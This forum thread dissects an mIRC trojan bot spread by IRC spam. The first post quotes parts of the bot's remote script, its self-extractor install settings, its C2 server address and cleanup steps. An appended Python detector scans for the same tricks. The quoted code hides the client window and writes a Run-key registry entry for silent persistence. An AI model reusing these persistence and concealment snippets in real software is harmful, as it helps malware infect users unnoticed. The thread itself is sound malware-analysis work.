
Thread: IRC bot picked apart.

  1. #1
    Senior Member
    Join Date
    Oct 2005
    Posts
    197

    IRC bot picked apart.

    Ok I idle in a few channels on the Rizon IRC network. Rizon has been spammed to death lately with a botnet. So I'm sitting in front of my machine and get bored. The spam msg promises Russian sex! I know this is just probably a bot, but I do love my Russian sex. Ok so the spam message tells me to go to the url. So I go there and right off the bat I'm prompted to download movie.mpg.exe. That doesn't look like any Russian porn video I've ever seen. I ignore that and look at the top pics/links of porn related material. Ooooohh there's the Russian porn. I click a link. What do you know, that same exe is being served to me. Meh, let's download 'er and take a look.

    So I save to my desktop and notice it's just a self-extracting rar
    file. So right off the bat I know these guys either

    A) Aren't that smart
    B) Are lazy as hell
    -They didn't even bother to pack it better or to scramble it with UPX but that's another story altogether.

    What's the best thing about these rars you ask? Well simple. Right click and go to properties, then go to the comment tab. We see this.

    ;The comment below contains SFX script commands

    Path=C:\WINDOWS\java\
    SavePath
    Setup=C:\WINDOWS\java\mirc.exe
    Silent=1
    Overwrite=2

    This will tell us that they're going to install to C:\windows\java and when the exe is done unpacking it's going to run mirc.exe. Bingobango it's a simple little mIRC trojan....if only we could have seen this coming... Ok, because it's a rar file we can open it with rar: right click on it again and click open with WinRAR.

    Files in the rar!

    bear.txt
    Con32.dll
    edih.dll
    connects
    mirc.exe

    Right off the bat we know that this is mIRC. mIRC needs an ini file, a remote file that holds all the remote code. Click on these files and view them.

    bear.txt snippet

    ; Set bY mC_YaRgIc ...

    on *:start: {
    celebili
    timer12123 0 1 secret
    timerasd 0 150 mC_YARGIc
    mC_YARGIc
    unset %*
    .timer -i 1 2 NICK $_rands
    .timer -i 1 2 ANICK $_rands
    .timer -i 1 2 IDENTD ON $_rands
    .timer -i 1 2 FULLNAME $_rands
    .timer -i 1 2 EMAILADDR $_rands
    .timer -i 0 60 _start
    .timer -i 0 10 _reg
    if $exists(up.reg) {
    .remove up.reg
    }

    Yep, this file holds all the guts of the bot. The remote code.

    Con32.dll snippet

    www.klavye.com
    Kenan
    mkilhan
    Crasus
    mC_YaRgIc
    4,1 -»«-15,1 0,1K15,1a0,1ç15,1a0,1k15,1 v44,1 -»«-15,1 www.Kacak.net 4,1-»«- 
    mIRC v6.03 Khaled Mardam-Bey
    mIRC 6.16 Khaled Mardam-Bey
    mIRC v6.15 Khaled Mardam-Bey
    mIRC v6.14 Khaled Mardam-Bey
    mIRC v6.12 Khaled Mardam-Bey
    mIRC v6.11 Khaled Mardam-Bey
    mIRC v6.1 Khaled Mardam-Bey

    A version file. So if other clients CTCP VERSION this bot they will get different client version replies. Typical.

    Connects snippet

    [warn]
    fserve=on
    dcc=off
    [dirs]
    logdir=....\
    waves=......\
    midis=......\
    mp3s=......\
    wmas=......\
    oggs=......\
    [options]
    n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,0,0,2,0,0,4096,0,1,0,0,0,1,1,0,50,0,1
    n1=5,100,0,0,0,0,0,0,2,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
    n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
    n3=5000,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,3,1,0,1,0,0,0,0,1,1,0,23,0,0,1,3,180,0
    n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,99,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
    n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,1,26,0,0,1,8192,1,0,0,82,0
    n6=0,0,12,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,100,1,1,0,0,1,0,0,4,1,0,1
    n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,1,1,1,1,1,0,0,0,0,1,1,1,1

    There's our mirc.ini file.

    Edih.dll snippet

    MZ?   ÿÿ ? @ Ð º ? Í!?LÍ!This program cannot be run in DOS mode. $

    ?ÁŸÁö?ñ?ö?ñ?ö?ñ??ú???ñ?u?ÿ?â?ñ?ö?ð???ñ???â?ó?ñ??û???ñ??õ???ñ?Richö?ñ? PE L mÈ?< * !
     [? [? FÀ  p      Ð        Ã K Â

    hmmmm this is an actual dll file. Wonder what it does? View the contents of bear.txt
    **NOTE** everything in bold after a line is my description of what it does.

    ; Set bY mC_YaRgIc ...

    on *:start: {
    celebili **Calls an alias**
    timer12123 0 1 secret **Calls an alias every 1 second**
    timerasd 0 150 mC_YARGIc **Calls an alias every 2.5 minutes**
    mC_YARGIc **Calls an alias**
    unset %* **Unsets all variables**
    .timer -i 1 2 NICK $_rands **Timer sets the nick to something random**
    .timer -i 1 2 ANICK $_rands **Timer sets the alt nick to something random**
    .timer -i 1 2 IDENTD ON $_rands **Timer sets the identd nick to something random**
    .timer -i 1 2 FULLNAME $_rands **Timer sets the fullname to something random**
    .timer -i 1 2 EMAILADDR $_rands **Timer sets the email address to something random**
    .timer -i 0 60 _start **Calls an alias**
    .timer -i 0 10 _reg **Calls an alias**
    if $exists(up.reg) {
    .remove up.reg **Deletes up.reg**
    }
    write up.reg REGEDIT4
    write up.reg [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] **Makes a reg file**
    write up.reg "Startup"=" $+ $nopath($mircexe) $+ "
    _reg
    }
    on *:exit: {
    run -n regedit /s up.reg **When mIRC closes it runs regedit to silently (/s) run that reg file again**
    run $nopath($mircexe) **so mIRC will start again on boot.**
    }
    on *:connect: {
    if $serverip == %serverip { **if/when mIRC connects to the server join %join**
    .timer -i 1 5 JOIN %join
    }
    }
    on *:disconnect: { **part all channels and rejoin server**
    partall
    server
    }

    There was a lot of code here, but it was all the bot code. Basically remote commands for the 'admins' of this bot. !spam would spam, !clone would load more clones, !server would change server and stuff like that. I don't want more spam so I'm not going to post all the code.

    alias _servmessage {
    if $server {
    if m isincs $chan(%join).mode && $me !isvoice %join { **join channel**
    return
    }
    scid 1 .msg %join $1- **join channel and hide the channel window in mIRC so the user can't see it.**
    }
    }
    alias mC_YARGIc {
    scid -a window -hn "Status Window" **hide the status window. So the user can't see it or do anything.**
    }
    alias celebili { .echo Kenan $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }
    alias secret { if ($appstate != hidden) { .echo hidden $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) } }
    alias _start {
    if !%readed {
    _opensocks
    }
    }

    The celebili code above hides mIRC from the desktop. The secret code states that if mIRC isn't hidden then hide it!

    The rest of this file was just more remote code that I'm not going to publish.


    Open up connects and look for this line. host=208.53.162.102SERVER:208.53.162.102:6667. There's the server this bot connects to. Let's open our IRC client and connect to it. When we connect we get irc.mkilhan.com from the MOTD (Message Of The Day - the IRC server's message) so we know that this server is mkilhan.com. Let's go to their website and take a look. Nope nothing really of any use there.
    Ok let's copy a mirc.exe into that C:\windows\java dir and open up the bear.txt and edit it so it doesn't do anything nasty when we connect. I'm going to remove all the hidden/reg stuff and show you what it looks like when we're done.

    on *:start: {
    unset %*
    .timer -i 1 2 NICK $_rands
    .timer -i 1 2 ANICK $_rands
    .timer -i 1 2 IDENTD ON $_rands
    .timer -i 1 2 FULLNAME $_rands
    .timer -i 1 2 EMAILADDR $_rands
    .timer -i 0 60 _start
    .timer -i 0 10 _reg
    }


    Also go down to these lines so we can edit them to what I have so we can see what's going on when we connect


    alias mC_YARGIc {
    echo Status Window not hidden anymore we wana see stuff
    }
    alias celebili { .echo celebili } **don't need that hide dll. And we'll see when that alias is called**
    alias secret { if ($appstate != hidden) { .echo hidden } } **same as above**
    alias _start {
    if !%readed {
    echo _opensocks **we don't need that. Let's just open that.**
    }
    }

    Ok so now we run the mirc.exe. We connect to the network then join #intikam. Interesting. Look at all those bots, there's gotta be 100 or so. Let's whois the admins; they're admins so their hostmasks are masked. Meh, we got 'em anyways. Let's do a /list so we can see other channels. There's just 4 or so. Nothing special. At this point they noticed one of their bots snooping
    around their network and killed me with a k-line. Guess I'm not wanted there.

    Clean up!
    Ok delete those files from the java dir. Then open regedit and go to

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete the mirc entry.

    Closing!

    Ok this bot was simple, it would be more effective if the bot was packed better. Thus it would have been a little harder to pick up but not very. Also they should have used the %windir% variable instead of C:\windows so the bot would work on more OSs. They shouldn't have used their IRC nicks as aliases. After I did this experiment I whois'ed their IPs and emailed the abuse accounts for the subnets for both the webhosting site and the IRC network and told them about the bot. Might not do anything but still. I could have gone farther and tried to CTCP chat the admins then used netstat to find their IPs. Meh, I don't really care. I'm glad I got to take a look at what they're doing and how all this stuff works. I hope someone finds this info useful or entertaining. It just goes to show you that the promise of free sex on the internet is usually just that.

    One More Thing!
    If you have ever talked to me you know I can't spell and my grammar sucks. I tried to spell check with Google toolbar, nothing came up. My OpenOffice isn't working as it should so there might be some spelling mistakes. FOR THIS I'M SORRY!
    meh. -ech0.
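    A small triage helper, added here as an example and not part of ech0's post or of the bot itself: it scans a mIRC remote script for the hiding and persistence tricks picked apart above (the $dll hide call, the hidden "Status Window", the Run-key .reg file, the silent regedit on exit, the randomised nick/ident/fullname) and pulls the server out of an mirc.ini-style connects line. The sample script and ini text are constructed from the lines quoted in the post; the rule names are my own.

```python
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

# Each rule names a behaviour seen in the bear.txt snippets quoted in the post.
RULES = [
    ("hides mIRC window through DLL call", re.compile(r"\$dll\([^,]+,\s*do_ShowWindow\b", re.I)),
    ("hides the status window", re.compile(r'window\s+-hn\s+"Status Window"', re.I)),
    ("writes Run key into a .reg file", re.compile(r"^\s*write\s+\S+\.reg\s+\[" + re.escape(RUN_KEY) + r"\]", re.I)),
    ("silent regedit import on exit", re.compile(r"^\s*run\s+-n\s+regedit\s+/s\b", re.I)),
    ("randomises identity fields", re.compile(r"^\s*\.?timer\b.*\b(NICK|ANICK|IDENTD|FULLNAME|EMAILADDR)\s+(ON\s+)?\$_rands", re.I)),
    ("unsets all variables on start", re.compile(r"^\s*unset\s+%\*", re.I)),
]

def triage_remote_script(text):
    """Map each matched rule description to the 1-based line numbers that matched."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for desc, rx in RULES:
            if rx.search(line):
                hits.setdefault(desc, []).append(lineno)
    return hits

def extract_servers(ini_text):
    """Pull (host, port) pairs from an mirc.ini-style line such as
    host=208.53.162.102SERVER:208.53.162.102:6667 (as quoted in the post)."""
    return re.findall(r"SERVER:([A-Za-z0-9.-]+):(\d+)", ini_text)

# Constructed samples assembled from lines quoted in the post.
SAMPLE_SCRIPT = r"""on *:start: {
celebili
unset %*
.timer -i 1 2 NICK $_rands
.timer -i 1 2 IDENTD ON $_rands
write up.reg [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
write up.reg "Startup"=" $+ $nopath($mircexe) $+ "
}
on *:exit: {
run -n regedit /s up.reg
}
alias mC_YARGIc {
scid -a window -hn "Status Window"
}
alias celebili { .echo Kenan $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }"""
SAMPLE_INI = "[mirc]\nhost=208.53.162.102SERVER:208.53.162.102:6667\n"

if __name__ == "__main__":
    for desc, lines in triage_remote_script(SAMPLE_SCRIPT).items():
        print(f"{desc}: lines {lines}")
    print("C2 servers:", extract_servers(SAMPLE_INI))
```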

  2. #2
    Junior Member
    Join Date
    Oct 2005
    Posts
    1
    Ah, gotta love mIRC coding, so easy to do and so many options. Yeah, nice job picking this apart. I hate botnets. A lot. But it's always fun to mess around with code. Either way, very very interesting. I used to dabble a lot in mIRC bots and stuff but I stopped doing that a while ago; so many IRC networks have gotten so... bad because of all the bots.

  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    I've dissected several variants of this bot back in early August. It's been in circulation since early last summer and other variants actually carry the mirc.ini file with it along with a transparent ico file so that when mIRC fires, the user doesn't see it in the system tray.

    You can find this bot in a bot library out on the net. All you have to do is DL the bot kit and modify it to your liking. I found it when some dummy left a tag in one of the files pointing back to where he got the code from. Needless to say, that site is no longer active. The downside is that 10 more took its place the next hour.

    This is a very nicely laid out dissection. I have to produce a similar technical report each time we find an unknown bot in our environment. I'm currently looking for able bodies who can do this not just for simple bots like this one but for more complex bots that use various packagers such as Yoda, UPX, etc. Expert use of IDAPro (nice hex editor & reverse engineering app) and ASM (assembler) are certainly a plus. Looking for a job?
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4
    Senior Member
    Join Date
    Oct 2005
    Posts
    197
    Sounds like fun. I have experience with compiling bots, then packing them with UPX (used Yoda before), and scrambling the headers. I really haven't travelled the path of recompiling them that far other than mIRC bots. Mainly because I know the basics of mIRC scripting and how they try and install Iroffer/ftp execs. I can get sources for old bots like Phatbot/Stoney/DSNX and so on. Honestly this is quickly becoming a hobby of mine. I love the cat and mouse game with them. How the authors try and hide, load, run, and propagate the bots is very interesting to me. I'd be happy to help, I just might need a push in the right direction to get all the tools and such for the bigger bots. I would love to pick apart the q7897237823793.tmp bots that sit in my temp files from time to time.
    meh. -ech0.

  5. #5
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    Grab yourself a copy of IDAPro (or any other fully functional hex editor) and run over to your favorite bookstore and get a book on ASM. Also, download BINTEXT to pan through binaries to find any text that may offer some insight into what the bot does. This is similar to the STRINGS command in Linux.

    If you need a push, shoot me a PM from time to time and I would be happy to point you in the right direction.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  6. #6
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    and run over to your favorite bookstore and get a book on ASM
    May I recommend Assembly Language for Intel-Based Computers by Kip R. Irvine
    http://www.amazon.com/gp/product/013...104463-4776134

    That is one of the books that I used in a computer organization class.

    I'm not sure why... but ASM for Motorola processors is a bit easier to learn. Maybe it's because I have more experience with that... but it's easy enough to switch back and forth. The concepts are pretty similar... just the instruction set op codes and operands are different.

    TH: Have you ever messed with OllyDbg?
    http://www.ollydbg.de/

    What do you think of it vs. IDAPro?

    Ahh... ASM... brings back many memories of sleepless nights and burned fingers from solder... We had to build our own I/O to interface with the processors. Fun Fun...
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
